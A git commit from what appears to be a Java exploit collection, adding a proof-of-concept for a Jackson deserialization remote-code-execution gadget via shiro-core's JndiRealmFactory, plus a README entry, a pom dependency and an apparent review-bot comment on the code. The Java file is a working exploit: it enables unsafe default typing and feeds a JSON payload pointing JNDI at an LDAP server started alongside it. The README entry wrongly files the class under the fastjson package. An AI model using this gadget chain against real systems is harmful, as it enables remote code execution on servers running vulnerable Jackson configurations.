
Commit 6d89b02

author
“threedr3am”
committed
feat:添加jackson shiro-core gadget
1 parent 1bc037f commit 6d89b02


3 files changed

+48
-0
lines changed


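--- a/README.md
+++ b/README.md
@@ -13,6 +13,7 @@ package:com.threedr3am.bug.fastjson.rce
 5. com.threedr3am.bug.fastjson.rce.JndiConverterPoc(JndiConverter) 利用条件:fastjson <= 1.2.62 RCE,需要开启AutoType
 6. com.threedr3am.bug.fastjson.rce.HadoopHikariPoc(HikariConfig) 利用条件:fastjson <= 1.2.62 RCE,需要开启AutoType
 7. com.threedr3am.bug.fastjson.rce.IbatisSqlmapPoc(JtaTransactionConfig) 利用条件:fastjson <= 1.2.62 RCE,需要开启AutoType
+8. com.threedr3am.bug.fastjson.rce.ShiroPoc(shiro-core) 利用条件:fastjson <= 1.2.66 RCE,需要开启AutoType
 
 ##### SSRF
 package:com.threedr3am.bug.fastjson.ssrf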

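--- a/jackson/pom.xml
+++ b/jackson/pom.xml
@@ -120,6 +120,12 @@
 <artifactId>ibatis-sqlmap</artifactId>
 <version>2.3.4.726</version>
 </dependency>
+
+<dependency>
+<groupId>org.apache.shiro</groupId>
+<artifactId>shiro-core</artifactId>
+<version>1.5.1</version>
+</dependency>
 </dependencies>
 
 </project>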
Lines changed: 41 additions & 0 deletions
@@ -0,0 +1,41 @@
1+
package com.threedr3am.bug.jackson.rce;
2+
3+
import com.fasterxml.jackson.databind.ObjectMapper;
4+
import com.threedr3am.bug.common.server.LdapServer;
5+
import java.io.IOException;
6+
7+
/**
8+
* 比较鸡肋,需要调用writeValueAsString才能触发,因为Collection<Realm> getRealms()的返回值虽然是Collection,
9+
* 但是貌似是因为有泛型子类型导致值解析使用AsArrayTypeDeserialize,然后getter的invoke之前判断不为空就抛异常了
10+
*
11+
* shiro-core gadget
12+
*
13+
* <dependency>
14+
* <groupId>org.apache.shiro</groupId>
15+
* <artifactId>shiro-core</artifactId>
16+
* </dependency>
17+
*
18+
* @author threedr3am
19+
*/
20+
public class ShiroPoc {
21+
22+
static {
23+
//rmi server示例
24+
// RmiServer.run();
25+
26+
//ldap server示例
27+
LdapServer.run();
28+
}
29+
30+
public static void main(String[] args) throws IOException {
31+
ObjectMapper mapper = new ObjectMapper();
32+
mapper.enableDefaultTyping();
33+
34+
String json = "[\"org.apache.shiro.realm.jndi.JndiRealmFactory\", {\"jndiNames\": \"ldap://localhost:43658/Calc\"}]";
35+
System.out.println(json.charAt(65));
36+
Object o = mapper.readValue(json, Object.class);
37+
mapper.writeValueAsString(o);
38+
}
39+
40+
41+
}
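Review bot: `System.out.println(json.charAt(65));` on the line before `readValue` looks like leftover debugging — it prints a single character of the payload and plays no part in the gadget demonstration, so it should be dropped. `mapper.enableDefaultTyping()` has been deprecated since Jackson 2.10 in favour of `activateDefaultTyping(PolymorphicTypeValidator, ...)`; since this PoC deliberately relies on the unsafe unvalidated default typing, a comment such as `// intentionally unsafe: default typing with no PolymorphicTypeValidator, so the attacker-chosen class name is honoured` would make the precondition explicit to readers. The port 43658 in the `ldap://localhost:43658/Calc` payload must match whatever `LdapServer.run()` binds, which is not visible here; consider deriving the URL from a shared constant so the PoC does not silently break if the server port changes. The class Javadoc already notes that the trigger is `writeValueAsString` (serialization invoking `getRealms()`), which is the non-obvious part worth keeping, but the `// RmiServer.run();` commented-out code could be replaced by a one-line comment naming it as the alternative. Separately, the README hunk in this commit lists the class as `com.threedr3am.bug.fastjson.rce.ShiroPoc` with a fastjson version condition, whereas the new file is in package `com.threedr3am.bug.jackson.rce`, which looks like a copy-paste slip in the README entry.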
